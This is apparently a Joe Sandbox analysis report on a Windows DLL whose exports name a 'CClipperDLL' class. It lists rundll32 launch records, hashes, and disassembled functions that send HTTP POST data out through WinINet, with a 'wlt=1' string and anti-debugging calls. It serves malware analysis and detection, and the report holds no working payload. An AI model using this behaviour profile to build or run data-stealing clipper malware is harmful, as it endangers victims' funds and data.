MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:48:35
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Imagebase:	0x240000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:48:35
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1
Imagebase:	0x240000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:48:38
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
Imagebase:	0x240000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:48:41
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,Main
Imagebase:	0x240000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	01:48:44
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Imagebase:	0x240000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:48:44
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
Imagebase:	0x240000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:48:44
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",Main
Imagebase:	0x240000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.1%
Total number of Nodes:	1156
Total number of Limit Nodes:	28

Executed Functions

Function 6E4E1EC0 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 409
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6E4E1EC5

Part of subcall function 6E4E6751: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E4E675D

InternetOpenW.WININET(6E4FBA54,00000000,00000000,00000000,00000000), ref: 6E4E1FA7
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6E4E1FCE
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6E4E1FF8
HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6E4E2031
InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6E4E204B
InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6E4E224B
InternetCloseHandle.WININET(00000000), ref: 6E4E2266
InternetCloseHandle.WININET(?), ref: 6E4E226E
InternetCloseHandle.WININET(?), ref: 6E4E2276

Strings

string too long, xrefs: 6E4E1EC0
Content-Type: application/x-www-form-urlencoded, xrefs: 6E4E1F71
POST, xrefs: 6E4E1FF2

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendXinvalid_argumentstd::_std::invalid_argument::invalid_argument
String ID: Content-Type: application/x-www-form-urlencoded$POST$string too long
API String ID: 4066372336-370044323
Opcode ID: 1d4d3cb32b1b3bc3fd286e043ecdcff902d11a08a1a9113a72b6227daddfbd89
Instruction ID: 33e7eaf1747e4092f778ee27b1a7e2e1fff1be3df3b64dc206175034126d5a01
Opcode Fuzzy Hash: 1d4d3cb32b1b3bc3fd286e043ecdcff902d11a08a1a9113a72b6227daddfbd89
Instruction Fuzzy Hash: 8FF1E1B09102199BEB24CF78CC84BDDBBB5AF44305F5041DDE609AB681CB75AAC4CF99

Function 6E4E31B0 Relevance: 18.0, APIs: 7, Strings: 3, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

abcdefghijklmnopqrstuvwxyz0123456789, xrefs: 6E4E357D
wlt=1, xrefs: 6E4E3ADA
+++, xrefs: 6E4E3B4B

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID:
String ID: +++$abcdefghijklmnopqrstuvwxyz0123456789$wlt=1
API String ID: 0-2251221455
Opcode ID: 74bf3d4899feab3f8002337393638984585930bcfbc09530bea3e3af395c9fe2
Instruction ID: bd5effbbe16d20891d9d9489fbf8d78174e9afad6dbce0828d0806f9a3b3efa6
Opcode Fuzzy Hash: 74bf3d4899feab3f8002337393638984585930bcfbc09530bea3e3af395c9fe2
Instruction Fuzzy Hash: 8AF10371A00249AFEB04CFB8D848F9EBBB9EB45715F10465EE811ABBC0DB759940CBD1

Function 6E4E1ED0 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 386
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(6E4FBA54,00000000,00000000,00000000,00000000), ref: 6E4E1FA7
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6E4E1FCE
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6E4E1FF8
HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6E4E2031
InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6E4E204B
InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6E4E224B
InternetCloseHandle.WININET(00000000), ref: 6E4E2266
InternetCloseHandle.WININET(?), ref: 6E4E226E
InternetCloseHandle.WININET(?), ref: 6E4E2276

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 6E4E1F71
POST, xrefs: 6E4E1FF2

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID: Content-Type: application/x-www-form-urlencoded$POST
API String ID: 1354133546-2387545335
Opcode ID: 8351155834e921456ee1a4a91846747d54c0cbd06ab813484591faed9a1ea621
Instruction ID: 27fa45f60111f9d2e93adf95bf5f6daf74d35af07e739c8c54b651f547368c4f
Opcode Fuzzy Hash: 8351155834e921456ee1a4a91846747d54c0cbd06ab813484591faed9a1ea621
Instruction Fuzzy Hash: 55F1E1B0A00219DBEB24CF78CC84B9DBBB5AF45305F5041DDE609AB681CB759AC4CF99

Function 6E4E6E7A Relevance: 10.6, APIs: 7, Instructions: 138
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6E4E6EC1
___scrt_uninitialize_crt.LIBCMT ref: 6E4E6EDB

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: fb9c222ec58e339fbd4dc08d420a694e0584301c73b4ce23a88d18859c468e5c
Instruction ID: b98a786a0791608f36aa8634a9c752848a1e5ec78973120c35ac5fa7e56b6617
Opcode Fuzzy Hash: fb9c222ec58e339fbd4dc08d420a694e0584301c73b4ce23a88d18859c468e5c
Instruction Fuzzy Hash: 2D41F772D14219AFDB218FF9D844FAE3AB9EF80BA6F10495BE91467A81C7304D01CBD0

Function 6E4E6F2C Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6E4E6F69
dllmain_crt_dispatch.LIBCMT ref: 6E4E6F80
dllmain_raw.LIBCMT ref: 6E4E6FC8
dllmain_crt_dispatch.LIBCMT ref: 6E4E6FDB
dllmain_raw.LIBCMT ref: 6E4E6FEE

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: b719308f7c797cf5df96f8accdefec5ffce649bbe6ef68f820b3d764cace6b53
Instruction ID: 91c0c76e242868ca85f7198d78f53c1723a5b3bd26f2b41a21317119bc4f3e90
Opcode Fuzzy Hash: b719308f7c797cf5df96f8accdefec5ffce649bbe6ef68f820b3d764cace6b53
Instruction Fuzzy Hash: 5D21B471D14129AFDB618FF5C844EAF3A69EB84BA6F01455BFD1467A51C3308D019BD0

Function 6E4EB423 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,00000001,6E4EB68B,6E4EB935,?,?,6E4EAB0E), ref: 6E4EB428
_free.LIBCMT ref: 6E4EB485
_free.LIBCMT ref: 6E4EB4BB
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000001,6E4EB68B,6E4EB935,?,?,6E4EAB0E), ref: 6E4EB4C6

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: e64e23a050ae7e122fa720e52baecf6495d8812312f3cc12a44597a66dad4171
Instruction ID: 0474ba34646a46ba55e3b97f6fac714d1cfac75cd9a61a3ca4236cff8e244800
Opcode Fuzzy Hash: e64e23a050ae7e122fa720e52baecf6495d8812312f3cc12a44597a66dad4171
Instruction Fuzzy Hash: C0114C31600B006ED6616AFA7CC0F6B255E9BC2B7FB280E2BF52893AC9DF218C114595

Function 6E4E6D73 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6E4E6DC0

Part of subcall function 6E4E7490: InitializeSListHead.KERNEL32(6E4FF718,6E4E6DCA,6E4FC7B0,00000010,6E4E6D5B,?,?,?,6E4E6F85,?,00000001,?,?,00000001,?,6E4FC7F8), ref: 6E4E7495

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E4E6E2A

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: ee0da3876790ffed2b947f0a8990f31418eedab631ece946a81d606434dedcf4
Instruction ID: a9eac9af6a67636474e0e6fd6e1bfc30452e34586741e1208f2839a8fd9151bc
Opcode Fuzzy Hash: ee0da3876790ffed2b947f0a8990f31418eedab631ece946a81d606434dedcf4
Instruction Fuzzy Hash: 6E21D1329692459ADB416BF8E414FDC37A5AF0262FF1148DFDA816BAC2CF215401C6E5

Function 6E4EEEAE Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6E4EB8B2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E4EB46E,00000001,00000364,00000006,000000FF,?,00000001,6E4EB68B,6E4EB935,?,?,6E4EAB0E), ref: 6E4EB8F3

_free.LIBCMT ref: 6E4EEF1D

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5f52aec67efb57151ddd9cf007e78782c2d025e2ddda8bab545638a33767c9fe
Instruction ID: d704c7563dd7a703af59afe3fb9d902205e9d78046f1b866a05286187840f459
Opcode Fuzzy Hash: 5f52aec67efb57151ddd9cf007e78782c2d025e2ddda8bab545638a33767c9fe
Instruction Fuzzy Hash: CF01D6726043166BD3258FB8C881DCAFBA8FB053B1F15066EE555A7AC0D370A811CBE0

Function 6E4EB8B2 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E4EB46E,00000001,00000364,00000006,000000FF,?,00000001,6E4EB68B,6E4EB935,?,?,6E4EAB0E), ref: 6E4EB8F3

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d761fdfaf39af804b0ab7891687bb7963dd51273fa0c6f0f528f22f7be3e7cf2
Instruction ID: 7b8baff524b4288bf5647e475499b4c0e9a1869e98644602da00c42ee4d57906
Opcode Fuzzy Hash: d761fdfaf39af804b0ab7891687bb7963dd51273fa0c6f0f528f22f7be3e7cf2
Instruction Fuzzy Hash: 7EF0BB31915B2957EB715EF79C14E47375CBF82A62B114063D85496BCCCB70D80186D1

Non-executed Functions

Function 6E4E7288 Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6E4E7294
IsDebuggerPresent.KERNEL32 ref: 6E4E7360
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E4E7380
UnhandledExceptionFilter.KERNEL32(?), ref: 6E4E738A

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 588eed875de7223cd4f2626a6f06dcf3df269ee39b9bca1968800e54a0b46efe
Instruction ID: 32477e9d00b7044540c70715709409ee0d46cb13a6014b7c66bede680ffdc3f3
Opcode Fuzzy Hash: 588eed875de7223cd4f2626a6f06dcf3df269ee39b9bca1968800e54a0b46efe
Instruction Fuzzy Hash: 143118B5D1521CDBDB50DFA4D989BCDBBB8AF08705F1040EAE449AB280EB745A84CF44

Function 6E4E9820 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E4E9918
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E4E9922
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6E4E992F

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d3c3015db336c94551ad6c378144cfe995ec788cae9ea8d15068b47aa210446b
Instruction ID: ab800abeca5c0a11e1f4cee5f7bfa444adceb1e5cbb774a367005a3fcbc9c0b1
Opcode Fuzzy Hash: d3c3015db336c94551ad6c378144cfe995ec788cae9ea8d15068b47aa210446b
Instruction Fuzzy Hash: 0131E67491122C9BCF61DF64D888BCDBBB8BF48311F5041EAE91CA7291E7349B858F84

Function 6E4EA254 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6E4EA253,?,00000001,?,?), ref: 6E4EA276
TerminateProcess.KERNEL32(00000000,?,6E4EA253,?,00000001,?,?), ref: 6E4EA27D
ExitProcess.KERNEL32 ref: 6E4EA28F

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: aaf58d5e68c44427886be38ea1fe20235639386a3418f928dfafa4688329d447
Instruction ID: 610e41355d0a39076f0ca3ee8681adf9624adf4d9a9953f5a5b4ecb7ce864dab
Opcode Fuzzy Hash: aaf58d5e68c44427886be38ea1fe20235639386a3418f928dfafa4688329d447
Instruction Fuzzy Hash: 83E0BF31410544EFCF517BB4E818E493B79FF45642B504455F80696A21CB36DD91EAD1

Function 6E4F1AB1 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E4F1AAC,?,?,00000008,?,?,6E4F1744,00000000), ref: 6E4F1CDE

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 4d84e2fd0470c4701f5cbd5cd44393f85f65270579d369960e42efae8b186c29
Instruction ID: 983e73ea0ca2cbaca6ccd37f1c2f6626488009b767a916e6b1ddec604eab5a67
Opcode Fuzzy Hash: 4d84e2fd0470c4701f5cbd5cd44393f85f65270579d369960e42efae8b186c29
Instruction Fuzzy Hash: C5B15671210609CFD704CF68C496F557BA0FF85764F25865AE8AACF3A2C335E986CB40

Function 6E4E70A7 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E4E70BD

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 7e6f39c48e328b1de9095a980625a8a15d469eea73790a9f1a3bdaec7edf1784
Instruction ID: 93ba39721c78ad322ee8284636ef8ce88d47b480d21a4ccbe25bf2a671aff92b
Opcode Fuzzy Hash: 7e6f39c48e328b1de9095a980625a8a15d469eea73790a9f1a3bdaec7edf1784
Instruction Fuzzy Hash: 585169B1A047158FDB04CFA5E4C4B9AB7F0EF85725F20846AD902EB781D374A950CF60

Function 6E4EBCEE Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39527355894c2f98fd81c3fddf34346f17a091da97b04ca3b9c3772dd133d5fd
Instruction ID: 314dfabe48de6cbc524831ab36d241826404243b0cad0db260cdcc663a308639
Opcode Fuzzy Hash: 39527355894c2f98fd81c3fddf34346f17a091da97b04ca3b9c3772dd133d5fd
Instruction Fuzzy Hash: A841A475804219AEDB20DFB9CC88EEABBB8AB45305F1442DEE41DE3604DA349E848F50

Function 6E4ED218 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6E4ED218

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 8f4d3123c4ec4b868dc8c2b60d16151eaf00f9b7f20c3e12c9a51f4ed3dc572e
Instruction ID: 80bbf85feb809f736bec3823290cedec913da279f1ac953ccef92a74d878dc6f
Opcode Fuzzy Hash: 8f4d3123c4ec4b868dc8c2b60d16151eaf00f9b7f20c3e12c9a51f4ed3dc572e
